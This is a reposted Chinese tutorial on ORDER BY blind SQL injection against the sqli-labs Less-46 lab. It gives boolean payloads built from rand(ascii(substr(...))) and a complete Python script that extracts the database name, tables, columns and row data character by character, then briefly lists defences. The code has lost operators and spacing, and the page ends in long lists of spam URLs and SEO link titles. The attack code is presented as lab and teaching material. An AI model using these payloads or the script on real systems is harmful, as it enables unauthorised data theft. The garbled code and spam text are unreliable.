当前位置：首页 > news >正文

动易网络官方网站最低价网站建设

news 2025/10/27 6:36:33

动易网络官方网站,最低价网站建设,dedecms 网站安全,网站设计主流尺寸目录一.order by盲注的原理二.注入方式 a.布尔盲注 b.时间盲注三.防御一.order by盲注的原理 order by子句是用于按指定列排序查询结果#xff0c;列名或列序号皆可。 order by 后面接的字段或者数字不一样#xff0c;那么这个数据表的排序就会不同。 order by 盲…目录一.order by盲注的原理二.注入方式 a.布尔盲注 b.时间盲注三.防御一.order by盲注的原理 order by子句是用于按指定列排序查询结果列名或列序号皆可。 order by 后面接的字段或者数字不一样那么这个数据表的排序就会不同。 order by 盲注利用的就是这一点。二.注入方式环境为sqli-labs的46关参数为sort传入id a.布尔盲注传入1时传入2时传入3时不同字段的顺序是不同的根据这个结果我们可以用rand实现盲注 ?sortrand(ascii(substr((select database()),1,1))114) 转为ASCII码来比较真假为真时第一列为admin3为假时第一列为Dumb 下面是脚本内容 import time import requests from bs4 import BeautifulSoupdef inject_database(url): #库dataname for i in range(1, 20):low 32high 128mid (low high) // 2while low high:payload rand(ascii(substr((select database()),%d,1))%d) % (i, mid)res {sort: payload}r requests.get(url, paramsres)html r.textsoup BeautifulSoup(html,html.parser)getusername soup.find_all(td)[1].textif getusername admin3:low mid 1else:high midmid (low high) // 2if mid 32:breakdataname chr(mid)return datanamedef inject_tables(url, database_name):#表tables []for i in range(0, 10): table_name for j in range(1, 20):low 32high 128mid (low high) // 2while low high:payload rand(ascii(substr((select table_name from information_schema.tables where table_schema%s limit %d,1),%d,1)) %d) % (database_name, i, j, mid)res {sort: payload}r requests.get(url, paramsres)html r.textsoup BeautifulSoup(html,html.parser)getusername soup.find_all(td)[1].textif getusername admin3:low mid 1else:high midmid (low high) // 2if mid 32:breaktable_name chr(mid)if table_name:tables.append(table_name)print(fTable {i1}: {table_name})return tablesdef inject_columns(url, database_name, table_name):#列columns []for i in range(0, 10): column_name for j in range(1, 20):low 32high 128mid (low high) // 2while low high:payload rand(ascii(substr((select column_name from information_schema.columns where table_schema%s and table_name%s limit %d,1),%d,1)) %d) % (database_name, table_name, i, j, mid)res {sort: payload}r requests.get(url, paramsres)html r.textsoup BeautifulSoup(html,html.parser)getusername soup.find_all(td)[1].textif getusername admin3:low mid 1else:high midmid (low high) // 2if mid 32:breakcolumn_name chr(mid)if column_name:columns.append(column_name)print(fColumn {i1}: {column_name})return columnsdef inject_data(url, database_name, table_name, column_name):#数据data []for i in range(0, 10): row_data for j in range(1, 20):low 32high 128mid (low high) // 2while low high:payload rand(ascii(substr((select %s from %s.%s limit %d,1),%d,1)) %d) % (column_name, database_name, table_name, i, j, mid)res {sort: payload}r requests.get(url, paramsres)html r.textsoup BeautifulSoup(html,html.parser)getusername soup.find_all(td)[1].textif getusername admin3:low mid 1else:high midmid (low high) // 2if mid 32:breakrow_data chr(mid)if row_data:data.append(row_data)print(fRow {i1}: {row_data})return dataif __name__ __main__:url http://127.0.0.1/sqli/Less-46/database_name inject_database(url)print(fDatabase Name: {database_name})tables inject_tables(url, database_name)print(fTables: {tables})if tables:columns inject_columns(url, database_name, tables[3])print(fColumns: {columns})if columns:username inject_data(url, database_name, tables[3], columns[1])password inject_data(url, database_name, tables[3], columns[2])print(fData: {username})print(fData: {password}) b.时间盲注时间盲注不依赖页面内容直接通过响应时间判断条件因此无需解析html 三.防御 1.预编译如PHP的PDO 2.最小权限原则限制数据库用户权限仅允许执行必要的操作。 3.输入长度限制 4.部署WAF
文章转载自：
http://www.morning.qwfq.cn.gov.cn.qwfq.cn
http://www.morning.rwlsr.cn.gov.cn.rwlsr.cn
http://www.morning.nzmqn.cn.gov.cn.nzmqn.cn
http://www.morning.fmznd.cn.gov.cn.fmznd.cn
http://www.morning.mygbt.cn.gov.cn.mygbt.cn
http://www.morning.xyjlh.cn.gov.cn.xyjlh.cn
http://www.morning.lwgsk.cn.gov.cn.lwgsk.cn
http://www.morning.bpmtj.cn.gov.cn.bpmtj.cn
http://www.morning.xgbq.cn.gov.cn.xgbq.cn
http://www.morning.seoqun.com.gov.cn.seoqun.com
http://www.morning.chkfp.cn.gov.cn.chkfp.cn
http://www.morning.tqsmg.cn.gov.cn.tqsmg.cn
http://www.morning.qnzk.cn.gov.cn.qnzk.cn
http://www.morning.zrrgx.cn.gov.cn.zrrgx.cn
http://www.morning.gnwpg.cn.gov.cn.gnwpg.cn
http://www.morning.mftzm.cn.gov.cn.mftzm.cn
http://www.morning.kpqjr.cn.gov.cn.kpqjr.cn
http://www.morning.bpmdz.cn.gov.cn.bpmdz.cn
http://www.morning.hfytgp.cn.gov.cn.hfytgp.cn
http://www.morning.qgfkn.cn.gov.cn.qgfkn.cn
http://www.morning.wdlg.cn.gov.cn.wdlg.cn
http://www.morning.jyznn.cn.gov.cn.jyznn.cn
http://www.morning.tbjtm.cn.gov.cn.tbjtm.cn
http://www.morning.xsszn.cn.gov.cn.xsszn.cn
http://www.morning.mnsmb.cn.gov.cn.mnsmb.cn
http://www.morning.rmtmk.cn.gov.cn.rmtmk.cn
http://www.morning.rqnml.cn.gov.cn.rqnml.cn
http://www.morning.wjlkz.cn.gov.cn.wjlkz.cn
http://www.morning.prjns.cn.gov.cn.prjns.cn
http://www.morning.mnnxt.cn.gov.cn.mnnxt.cn
http://www.morning.rwxnn.cn.gov.cn.rwxnn.cn
http://www.morning.lclpj.cn.gov.cn.lclpj.cn
http://www.morning.grtwn.cn.gov.cn.grtwn.cn
http://www.morning.rlnm.cn.gov.cn.rlnm.cn
http://www.morning.hylbz.cn.gov.cn.hylbz.cn
http://www.morning.hqjtp.cn.gov.cn.hqjtp.cn
http://www.morning.ssrjt.cn.gov.cn.ssrjt.cn
http://www.morning.rlnm.cn.gov.cn.rlnm.cn
http://www.morning.nrftd.cn.gov.cn.nrftd.cn
http://www.morning.zffps.cn.gov.cn.zffps.cn
http://www.morning.tlzbt.cn.gov.cn.tlzbt.cn
http://www.morning.wyppp.cn.gov.cn.wyppp.cn
http://www.morning.slwqt.cn.gov.cn.slwqt.cn
http://www.morning.ntgrn.cn.gov.cn.ntgrn.cn
http://www.morning.bfcxf.cn.gov.cn.bfcxf.cn
http://www.morning.mmosan.com.gov.cn.mmosan.com
http://www.morning.rxyz.cn.gov.cn.rxyz.cn
http://www.morning.bpmmq.cn.gov.cn.bpmmq.cn
http://www.morning.itvsee.com.gov.cn.itvsee.com
http://www.morning.zgnng.cn.gov.cn.zgnng.cn
http://www.morning.cmldr.cn.gov.cn.cmldr.cn
http://www.morning.dbnrl.cn.gov.cn.dbnrl.cn
http://www.morning.rxzcl.cn.gov.cn.rxzcl.cn
http://www.morning.bpmfn.cn.gov.cn.bpmfn.cn
http://www.morning.qnzld.cn.gov.cn.qnzld.cn
http://www.morning.hmdyl.cn.gov.cn.hmdyl.cn
http://www.morning.kfmnf.cn.gov.cn.kfmnf.cn
http://www.morning.drpbc.cn.gov.cn.drpbc.cn
http://www.morning.pslzp.cn.gov.cn.pslzp.cn
http://www.morning.rhdqz.cn.gov.cn.rhdqz.cn
http://www.morning.jtybl.cn.gov.cn.jtybl.cn
http://www.morning.rfhwc.cn.gov.cn.rfhwc.cn
http://www.morning.jyknk.cn.gov.cn.jyknk.cn
http://www.morning.cjmmn.cn.gov.cn.cjmmn.cn
http://www.morning.xrwbc.cn.gov.cn.xrwbc.cn
http://www.morning.mqbsm.cn.gov.cn.mqbsm.cn
http://www.morning.bfysg.cn.gov.cn.bfysg.cn
http://www.morning.mnsts.cn.gov.cn.mnsts.cn
http://www.morning.dpflt.cn.gov.cn.dpflt.cn
http://www.morning.lpskm.cn.gov.cn.lpskm.cn
http://www.morning.rbkml.cn.gov.cn.rbkml.cn
http://www.morning.ftmp.cn.gov.cn.ftmp.cn
http://www.morning.rwlnk.cn.gov.cn.rwlnk.cn
http://www.morning.rlkgc.cn.gov.cn.rlkgc.cn
http://www.morning.cpzkq.cn.gov.cn.cpzkq.cn
http://www.morning.glswq.cn.gov.cn.glswq.cn
http://www.morning.fqmcc.cn.gov.cn.fqmcc.cn
http://www.morning.zwzlf.cn.gov.cn.zwzlf.cn
http://www.morning.tkcz.cn.gov.cn.tkcz.cn
http://www.morning.nkhdt.cn.gov.cn.nkhdt.cn

http://www.tj-hxxt.cn/news/253131.html

相关文章：

网站设计贵不贵linux7 下载wordpress

别人帮我做的网站没用要交费用吗本地网页制作软件

怎么查找网站后台建设微信商城网站制作

车机油哪个网站做的好没有网站如何做营销

可视方便建站微网站哪个好怎么用像百度重新提交网站

辅助教学网站开发技术讨论台州网站设计开发

商城网站开发教程免费企业注册

中文绿色环保网站模板一条龙网站建设价格

做网站app需多少钱2023年网页游戏

寻找手机网站建设网站架构包含哪几个部分

企业品牌网站建设价格网站制作流程分为哪三步

烟台正规网站建设动易做网站

茂名市电白区住房和城乡建设局网站搭建系统

wordpress acg站苏州网站建设点一点

wordpress 评论时间seo和竞价排名的区别

无锡网站优化手机app与网站链接

旅游网站功能模块网站建设数据库代码

seo综合查询网站用php做网站的开发工具

企业网站建设流程介绍网络行业有哪些

网站的线下推广怎么做的做淘宝要网站?

那里可以做app网站品展示设计网站

中国农业建设中心网站湖南有线郴州网络有限公司

光谷软件园网站建设搜索引擎营销的模式有哪些

国家网站建设wordpress 文章有几种分类

阳谷做网站推广网站自己做的记者证

高校网站建设的优势和不足深圳做网站需要多少费用

重庆网站seo搜索引擎优化某网站注册需要邮箱是怎么弄

自建网站步骤塘下春华网站建设

池州网站建设兼职个人网站申请备案

北京市住房城乡建设门户网站公众号微信网站开发